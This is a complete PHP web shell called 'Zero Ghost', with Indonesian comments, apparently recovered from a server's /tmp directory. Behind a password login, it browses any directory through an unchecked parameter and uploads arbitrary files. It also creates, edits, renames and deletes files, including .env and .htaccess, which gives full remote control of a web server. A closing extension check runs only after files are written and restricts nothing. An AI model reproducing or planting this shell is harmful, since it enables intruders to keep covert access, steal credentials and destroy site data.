File: //tmp/2655a641b09603edc99b3bd8b23e5fa7.php
<?php
session_start();
// GANTI hash ini sesuai password kamu (ini hash dari 'rahasia123')
$hashed_password = '$2y$10$nXYXSvJ5Xl4KGP/17NYI5.0tc2DX11iGpibNIcMs20KNCMdco/Vzu';
// Logout
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Cek login
if (!isset($_SESSION['logged_in'])) {
if (isset($_POST['pass']) && password_verify($_POST['pass'], $hashed_password)) {
$_SESSION['logged_in'] = true;
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Form login
echo '<form method="POST">';
echo '<input type="password" name="pass" placeholder="Enter Password">';
echo '<input type="submit" value="Login">';
echo '</form>';
exit;
}
error_reporting(0);
$dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
chdir($dir);
$files = scandir(".");
function h($s) {
return htmlspecialchars($s);
}
function isText($file) {
$textFiles = ['.htaccess', '.env', '.gitignore'];
$extAllow = ['php', 'txt', 'html', 'css', 'js', 'json', 'env'];
$basename = basename($file);
$ext = pathinfo($basename, PATHINFO_EXTENSION);
return @is_file($file) && (in_array($basename, $textFiles) || in_array($ext, $extAllow));
}
// Upload
if ($_FILES) {
move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
echo "<p>✅ Uploaded: " . h($_FILES['file']['name']) . "</p>";
}
// Buat folder
if (isset($_POST['createfolder']) && !empty($_POST['newfolder'])) {
$folderName = basename($_POST['newfolder']);
if (!is_dir($folderName)) {
mkdir($folderName);
echo "<p>✅ Folder '$folderName' berhasil dibuat</p>";
} else {
echo "<p>⚠️ Folder sudah ada</p>";
}
}
// Header dan navigasi
echo "<h2>🗂️ Zero Ghost</h2>";
echo "<p>📁 Current Directory: " . h(getcwd()) . "</p>";
echo '<p><a href="?logout=1">🔒 Logout</a></p>';
// Upload form
echo '<form enctype="multipart/form-data" method="POST">';
echo '<input type="file" name="file">';
echo '<input type="submit" value="Upload">';
echo '</form>';
// Buat folder form
echo '<form method="POST" style="margin-top:10px;">';
echo '<input type="text" name="newfolder" placeholder="Folder Name">';
echo '<input type="submit" name="createfolder" value="Create Folder">';
echo '</form>';
echo "<hr>";
echo "<h3>➕ Create New File</h3>";
echo "<form method='POST'>";
echo "<input type='text' name='filename' placeholder='example.php' required>";
echo "<br><br>";
echo "<textarea name='filecontent' rows='10' cols='100' placeholder='Isi file...'></textarea>";
echo "<br><br>";
echo "<input type='submit' name='createfile' value='Create File'>";
echo "</form>";
// List file/folder
echo "<ul>";
foreach ($files as $file) {
if ($file == ".") continue;
$path = getcwd() . "/" . $file;
$urlDir = urlencode(getcwd());
$urlFile = urlencode($file);
echo "<li>$file ";
if (is_dir($file)) {
echo "[<a href='?dir=" . urlencode(realpath($path)) . "'>Open</a>]";
}
if (isText($file)) {
echo "[<a href='?edit=$urlFile&dir=$urlDir'>Edit</a>]";
}
echo " [<a href='?delete=$urlFile&dir=$urlDir' onclick='return confirm(\"Hapus?\")'>Delete</a>]";
echo " [<a href='?rename=$urlFile&dir=$urlDir'>Rename</a>]";
echo "</li>";
}
echo "</ul>";
// Hapus
if (isset($_GET['delete'])) {
$target = $_GET['dir'] . '/' . $_GET['delete'];
if (is_file($target)) {
unlink($target);
} elseif (is_dir($target)) {
rmdir($target);
}
header("Location: ?dir=" . urlencode($_GET['dir']));
exit;
}
// Edit
if (isset($_GET['edit'])) {
$file = $_GET['dir'] . '/' . $_GET['edit'];
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
file_put_contents($file, $_POST['content']);
echo "<p>✅ Disimpan</p>";
}
$content = @file_get_contents($file);
echo "<form method='POST'>";
echo "<textarea name='content' rows='20' cols='100'>" . h($content) . "</textarea><br>";
echo "<input type='submit' value='Save'>";
echo "</form>";
exit;
}
// Rename
if (isset($_GET['rename'])) {
$old = $_GET['dir'] . '/' . $_GET['rename'];
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$new = $_GET['dir'] . '/' . $_POST['newname'];
rename($old, $new);
header("Location: ?dir=" . urlencode($_GET['dir']));
exit;
}
echo "<form method='POST'>";
echo "Rename to: <input name='newname' value='" . h(basename($old)) . "'>";
echo "<input type='submit' value='Rename'>";
echo "</form>";
exit;
}
// Create
if (isset($_POST['createfile'])) {
$filename = basename($_POST['filename']);
$content = $_POST['filecontent'];
$path = getcwd() . '/' . $filename;
if (file_exists($path)) {
echo "<p>⚠️ File sudah ada</p>";
} else {
if (file_put_contents($path, $content) !== false) {
echo "<p>✅ File berhasil dibuat: " . h($filename) . "</p>";
} else {
echo "<p>❌ Gagal membuat file</p>";
}
}
}
$allow = ['php','txt','html','css','js'];
$ext = pathinfo($filename, PATHINFO_EXTENSION);
if (!in_array($ext, $allow)) {
echo "<p>❌ Ekstensi tidak diizinkan</p>";
return;
}
?>